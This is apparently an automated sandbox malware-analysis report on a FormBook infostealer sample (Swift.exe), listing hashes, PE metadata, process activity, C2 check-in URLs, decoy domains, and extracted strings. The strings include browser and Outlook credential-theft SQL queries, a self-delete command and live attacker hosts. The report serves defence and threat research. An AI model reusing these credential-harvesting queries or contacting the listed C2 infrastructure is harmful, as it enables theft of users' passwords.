| File name: | Swift.exe |
| Full analysis: | https://app.any.run/tasks/103f8475-eb46-4ad0-9af6-ab14bc0203c7 |
| Verdict: | Malicious activity |
| Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
| Analysis date: | March 02, 2023, 13:17:48 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive |
| MD5: | 3DD76F8A1D784669100B3FB4C2039D34 |
| SHA1: | 1D91FF731B65D405D087350F5EBBD7055F2C8242 |
| SHA256: | 1A28827929BBDF8FC02CBF542AE73DE715C0B4B0E1BE5C9484987EE44E652DA1 |
| SSDEEP: | 6144:PYa6Kiw77Q5CeR/Q2NBf7PGXyxC5ZlwZ/QGuC4G9R+WOs2n8kEh:PYMr779Q/QgaXy+ZmQGQGqhs6Qh |
| .exe | | | Win32 Executable MS Visual C++ (generic) (67.4) |
|---|---|---|
| .dll | | | Win32 Dynamic Link Library (generic) (14.2) |
| .exe | | | Win32 Executable (generic) (9.7) |
| .exe | | | Generic Win/DOS Executable (4.3) |
| .exe | | | DOS Executable Generic (4.3) |
| ProductName: | 70.82.91.83 |
|---|---|
| LegalTrademarks: | Termagant |
| LegalCopyright: | Copyright pyramidoprismatic |
| FileVersion: | 70.82.91.83 |
| FileDescription: | Budenny |
| CompanyName: | cross-lap |
| CharacterSet: | Unicode |
| LanguageCode: | English (U.S.) |
| FileSubtype: | - |
| ObjectFileType: | Executable application |
| FileOS: | Win32 |
| FileFlags: | (none) |
| FileFlagsMask: | 0x0000 |
| ProductVersionNumber: | 70.82.91.83 |
| FileVersionNumber: | 70.82.91.83 |
| Subsystem: | Windows GUI |
| SubsystemVersion: | 4 |
| ImageVersion: | 6 |
| OSVersion: | 4 |
| EntryPoint: | 0x3640 |
| UninitializedDataSize: | 2048 |
| InitializedDataSize: | 141824 |
| CodeSize: | 26624 |
| LinkerVersion: | 6 |
| PEType: | PE32 |
| ImageFileCharacteristics: | No relocs, Executable, No line numbers, No symbols, 32-bit |
| TimeStamp: | 2021:09:25 21:56:47+00:00 |
| MachineType: | Intel 386 or later, and compatibles |
| Architecture: | IMAGE_FILE_MACHINE_I386 |
|---|---|
| Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
| Compilation Date: | 25-Sep-2021 21:56:47 |
| Detected languages: |
|
| CompanyName: | cross-lap |
| FileDescription: | Budenny |
| FileVersion: | 70.82.91.83 |
| LegalCopyright: | Copyright pyramidoprismatic |
| LegalTrademarks: | Termagant |
| ProductName: | 70.82.91.83 |
| Magic number: | MZ |
|---|---|
| Bytes on last page of file: | 0x0090 |
| Pages in file: | 0x0003 |
| Relocations: | 0x0000 |
| Size of header: | 0x0004 |
| Min extra paragraphs: | 0x0000 |
| Max extra paragraphs: | 0xFFFF |
| Initial SS value: | 0x0000 |
| Initial SP value: | 0x00B8 |
| Checksum: | 0x0000 |
| Initial IP value: | 0x0000 |
| Initial CS value: | 0x0000 |
| Overlay number: | 0x0000 |
| OEM identifier: | 0x0000 |
| OEM information: | 0x0000 |
| Address of NE header: | 0x000000D8 |
| Signature: | PE |
|---|---|
| Machine: | IMAGE_FILE_MACHINE_I386 |
| Number of sections: | 5 |
| Time date stamp: | 25-Sep-2021 21:56:47 |
| Pointer to Symbol Table: | 0x00000000 |
| Number of symbols: | 0 |
| Size of Optional Header: | 0x00E0 |
| Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
|---|---|---|---|---|---|
.text | 0x00001000 | 0x00006676 | 0x00006800 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.41746 |
.rdata | 0x00008000 | 0x0000139A | 0x00001400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.14107 |
.data | 0x0000A000 | 0x00020378 | 0x00000600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.11058 |
.ndata | 0x0002B000 | 0x00010000 | 0x00000000 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0 |
.rsrc | 0x0003B000 | 0x00000CE8 | 0x00000E00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.24245 |
Title | Entropy | Size | Codepage | Language | Type |
|---|---|---|---|---|---|
1 | 5.29934 | 830 | UNKNOWN | English - United States | RT_MANIFEST |
103 | 2.16096 | 20 | UNKNOWN | English - United States | RT_GROUP_ICON |
105 | 2.66174 | 256 | UNKNOWN | English - United States | RT_DIALOG |
106 | 2.88094 | 284 | UNKNOWN | English - United States | RT_DIALOG |
111 | 2.48825 | 96 | UNKNOWN | English - United States | RT_DIALOG |
ADVAPI32.dll |
COMCTL32.dll |
GDI32.dll |
KERNEL32.dll |
SHELL32.dll |
USER32.dll |
ole32.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 820 | "C:\Users\admin\AppData\Local\Temp\cqdynsnaja.exe" | C:\Users\admin\AppData\Local\Temp\cqdynsnaja.exe | — | cqdynsnaja.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1064 | "C:\Windows\SysWOW64\cmmon32.exe" | C:\Windows\SysWOW64\cmmon32.exe | Explorer.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Monitor Exit code: 0 Version: 7.02.7600.16385 (win7_rtm.090713-1255) Modules
Formbook(PID) Process(1064) cmmon32.exe C2www.naijabrain.africa/k04s/ Strings (79)USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk systray audiodg certmgr autochk taskhost colorcpl services IconCache ThumbCache Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate
dat= f-start f-end Decoy C2 (64)draanabellrojas.com in03.one kyraloves.co.uk laluma.store londoncell.com kanurikibueadvocates.com buyeasynow.net escapefromtarkov-wiki.com crewint.net f-b.boats beautyaidstudio.com ashfieldconsultancy.uk dlogsadood.com ftgam.xyz constantinopanama.com yellowpocket.africa konyil.com easomobility.com 1135wickloecourt.com indexb2b.com kabridates.com forty04.com fourjaysgsps.com bukkaluy.com elvanite.co.uk ccnds.online medicswellnessconsult.africa dashuzhupin.com woodstockwine.africa advisorsforcharities.com jathinel.com bwin6789.com brandologic.net courier.africa f6zx.shop efefcondemned.buzz cosmochroniclesblog.com karmaapps.site kielenki.africa classbetter.online ffp78.com goodwebob.com facroryoutletstore.com kart746.xyz current-vaancies.com fourblendedsistas.store anjuhepay.com lawexpert9.info family-doctor-96425.com telcs.net huodede.com clarkwire.xyz aliencultist.com innovantexclusive.com theepiclandings.net happy-christmass.com bearcreekwood.com 370zhitch.com game2casino.com betternook.com ginkfazoltrelo.info andyrichardsonwv.com handygiftstore.com orientalwholesale.uk | |||||||||||||||
| 1472 | "C:\Users\admin\AppData\Local\Temp\Swift.exe" | C:\Users\admin\AppData\Local\Temp\Swift.exe | Explorer.EXE | ||||||||||||
User: admin Company: cross-lap Integrity Level: MEDIUM Description: Budenny Exit code: 0 Version: 70.82.91.83 Modules
| |||||||||||||||
| 1912 | C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | — | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2076 | /c del "C:\Users\admin\AppData\Local\Temp\cqdynsnaja.exe" | C:\Windows\SysWOW64\cmd.exe | — | cmmon32.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2204 | "C:\Users\admin\AppData\Local\Temp\cqdynsnaja.exe" C:\Users\admin\AppData\Local\Temp\gkhektwtan.nl | C:\Users\admin\AppData\Local\Temp\cqdynsnaja.exe | — | Swift.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| (PID) Process: | (1912) Explorer.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100 |
| Operation: | write | Name: | CheckSetting |
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB010000001094A779B0296D4E92E89D7830FD739D00000000020000000000106600000001000020000000B5A010A59F097943D9CB239011FC034BA41BD6A0C1BE1B9387BAAEAEF7E52D9D000000000E80000000020000200000008E7D886E72096A70D81633DDBCB821A2BB74F3FD94B2FC4F10DAD6F95EB8719CB00000002DD3083E4EBE0BB2335FAEF9B002CC655A46EC0F1A814F9879C00FE92903FDC702D6C7F7114A8B2D4048901E3B4C4516F6B323D77C5FFBDB9AA57A5B4DDA952198DA1926A082743F3DF2B82022473A4B06BC9168704E674CD4D4B629EBEA34EAB14314880AB6117F338D14380439F48822C8CF45415C4513704BEAC8E52AADA0C83BE86AC504D2E9ECE380406A233B63FCA29B5CBBD440B08B9DFE9222DE277405C42DF9AD5A35FC6D0A298BF0C63AB740000000C42C388F73DA1C91B453DF17B1C7524D12BB6207688C804D6C18C156C2CE8853A0B50A1727C77003D8F5639BAF608E9571558EC58305056334D6F39E28571B7C | |||
| (PID) Process: | (1912) Explorer.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
| Operation: | write | Name: | CheckSetting |
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB010000001094A779B0296D4E92E89D7830FD739D00000000020000000000106600000001000020000000201E89E829249CCD433542074DAA32A089CA27612D17928BC86FF0A9B2EEB8E2000000000E80000000020000200000006392FFF2E9C3E2C914E0EA725B47164B8BD3D6624910AE1E930ABB3EB086601030000000F9A98AE46FC9B45916C541FFFFADA3B6566A0361F0435822360BBAE05E1BA91F1F0F678808BC19FF962CDA14C8065AD940000000995D52EBEFC74CB5CFBB4761730A3C21C8F4E8BDCB7AAB7C6601846ABD66C92E0ACA54F69216CFCDE2BD844345723C732E6A99D106B00B28C46D1BB3CA5BA14A | |||
| (PID) Process: | (1912) Explorer.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count |
| Operation: | write | Name: | P:\Hfref\nqzva\NccQngn\Ybpny\Grzc\pdqlafanwn.rkr |
Value: 00000000000000000000000020000000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF000000000000000000000000 | |||
| (PID) Process: | (1912) Explorer.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count |
| Operation: | write | Name: | HRZR_PGYFRFFVBA |
Value: 000000008C00000093000000AA4F49000F0000001B000000FF5605007B00460033003800420046003400300034002D0031004400340033002D0034003200460032002D0039003300300035002D003600370044004500300042003200380046004300320033007D005C006500780070006C006F007200650072002E006500780065000000000000001C05012B000000001803000000000000943BEB76000000006200010000000000D43B78FBFE07000018030000000000001C05012B000000001C05012B000000000400000000000000000000000000000000000000000000000100000000000000103BEB7600000000E0E1BA0200000000040000000000000018030000000000000000000000000000040000000000000000000000000000000000000000000000056270FBFE0700005C000100000000001C05012B000000000000000000000000E11410FF000000000F0000001B0000003F4F05007B00460033003800420046003400300034002D0031004400340033002D0034003200460032002D0039003300300035002D003600370044004500300042003200380046004300320033007D005C006500780070006C006F007200650072002E0065007800650000000000000018030000000000000000000000000000010000000000000018030000000000000100000000000000D43B78FBFE070000DB9BEB76000000001C05012B00000000000000000000000000000000000000002219D20200000000081AD2020F0000001B000000FF5605007B00460033003800420046003400300034002D0031004400340033002D0034003200460032002D0039003300300035002D003600370044004500300042003200380046004300320033007D005C006500780070006C006F007200650072002E006500780065000000000000001C05012B000000001803000000000000943BEB76000000006200010000000000D43B78FBFE07000018030000000000001C05012B000000001C05012B000000000400000000000000000000000000000000000000000000000100000000000000103BEB7600000000E0E1BA0200000000040000000000000018030000000000000000000000000000040000000000000000000000000000000000000000000000056270FBFE0700005C000100000000001C05012B000000000000000000000000E11410FF000000000F0000001B0000003F4F05007B00460033003800420046003400300034002D0031004400340033002D0034003200460032002D0039003300300035002D003600370044004500300042003200380046004300320033007D005C006500780070006C006F007200650072002E0065007800650000000000000018030000000000000000000000000000010000000000000018030000000000000100000000000000D43B78FBFE070000DB9BEB76000000001C05012B00000000000000000000000000000000000000002219D20200000000081AD2020000000013000000784A13007B00310041004300310034004500370037002D0030003200450037002D0034004500350044002D0042003700340034002D003200450042003100410045003500310039003800420037007D005C007400610073006B006D00670072002E006500780065000000008000000000542D5FFDFE070000000000000000000068003902000000005C0001000000000000000000000000000000270000000000EB1AFD7600000000680039020000000000000000FE070000282568FDFE07000040F6310000000000180039020000000000000000000000000100000000000000BF1D5FFDFE07000000DFBA0200000000709D58020000000000000000000000003B94FEFCFE070000202858020000000008003902000000005C00010000000000869AEB760000000000CE639DF0F10000820200000000000000000000000000005C000100000000000000000000000000820200000000000002000000000000005C000100000000000000000000000000820200000000000080A61EFF00000000C81210FF00000000202858020000000001000000000000000F0000C000000000A0B4820300000000820200000000000001000000000000008202000000000000DB9BEB76000000005C00010000000000000000000000000000000000000000000100000000000000000000000000000081020000000000000000000000000000000000000000000000000000 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1472 | Swift.exe | C:\Users\admin\AppData\Local\Temp\cqdynsnaja.exe | executable | |
MD5:— | SHA256:— | |||
| 1472 | Swift.exe | C:\Users\admin\AppData\Local\Temp\ygyzbzjwsp.i | binary | |
MD5:— | SHA256:— | |||
| 1472 | Swift.exe | C:\Users\admin\AppData\Local\Temp\nsw8F49.tmp | binary | |
MD5:— | SHA256:— | |||
| 1472 | Swift.exe | C:\Users\admin\AppData\Local\Temp\gkhektwtan.nl | binary | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1912 | Explorer.EXE | GET | — | 23.230.169.48:80 | http://www.andyrichardsonwv.com/k04s/?ElP=g+i+KQlqAx1Og4O+dn07FkvnD97HyMH5V4u41kBb9s4MiZb9Rohsi9gVsGajj2NGMaWbSQ==&Qtr=KnSlyh88L68 | US | — | — | unknown |
1912 | Explorer.EXE | GET | 301 | 156.255.213.196:80 | http://www.in03.one/k04s/?ElP=5NpN/ha9CEUd2rG3M/CajS+sAce9zrTt4uCyhLeRqTcbzqwNF2XYns1pKqH5b8i+pl5vIg==&Qtr=KnSlyh88L68 | HK | html | 162 b | unknown |
1912 | Explorer.EXE | GET | 403 | 34.102.136.180:80 | http://www.bearcreekwood.com/k04s/?ElP=42tWVvZnqrK7GmadMiLBMujbpxIBwfQWlAl4wWV3Z3LMWby7wYZRuKoXIaiQiN4xaDAkTg==&Qtr=KnSlyh88L68 | US | html | 291 b | malicious |
1912 | Explorer.EXE | GET | 403 | 23.227.38.74:80 | http://www.buyeasynow.net/k04s/?ElP=SFNyjNzOkl5qiL23uYe77UpVhC4rEXIgzDRSjnaohc/DF2IcM6RPKr5O5OWWx6hcbIheQQ==&Qtr=KnSlyh88L68 | CA | html | 5.03 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1912 | Explorer.EXE | 156.255.213.196:80 | www.in03.one | MOACK.Co.LTD | HK | unknown |
— | — | 34.102.136.180:80 | www.bearcreekwood.com | GOOGLE-CLOUD-PLATFORM | US | whitelisted |
1912 | Explorer.EXE | 23.230.169.48:80 | www.andyrichardsonwv.com | EGIHOSTING | US | unknown |
1912 | Explorer.EXE | 23.227.38.74:80 | www.buyeasynow.net | CLOUDFLARENET | CA | malicious |
Domain | IP | Reputation |
|---|---|---|
www.in03.one |
| unknown |
www.bearcreekwood.com |
| malicious |
www.buyeasynow.net |
| malicious |
www.andyrichardsonwv.com |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1912 | Explorer.EXE | Unknown Classtype | ET MALWARE FormBook CnC Checkin (GET) |
1912 | Explorer.EXE | Unknown Classtype | ET MALWARE FormBook CnC Checkin (GET) |
1912 | Explorer.EXE | Unknown Classtype | ET MALWARE FormBook CnC Checkin (GET) |
1912 | Explorer.EXE | Unknown Classtype | ET MALWARE FormBook CnC Checkin (GET) |
1912 | Explorer.EXE | Unknown Classtype | ET MALWARE FormBook CnC Checkin (GET) |
1912 | Explorer.EXE | Unknown Classtype | ET MALWARE FormBook CnC Checkin (GET) |